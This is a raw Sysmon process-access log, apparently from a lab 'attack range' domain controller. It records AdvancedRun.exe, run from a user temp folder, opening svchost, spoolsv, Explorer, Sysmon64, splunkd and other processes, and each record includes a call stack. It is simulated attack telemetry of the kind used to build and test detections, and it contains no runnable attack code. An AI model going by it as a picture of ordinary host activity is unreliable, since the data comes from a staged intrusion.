10341000x80000000000000004015444Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004015443Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004015442Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004015441Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015412Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015411Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015410Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015409Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004015408Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004015407Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015406Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004015405Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004015404Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004015403Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004015402Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000004015401Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015400Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.349{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004015399Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
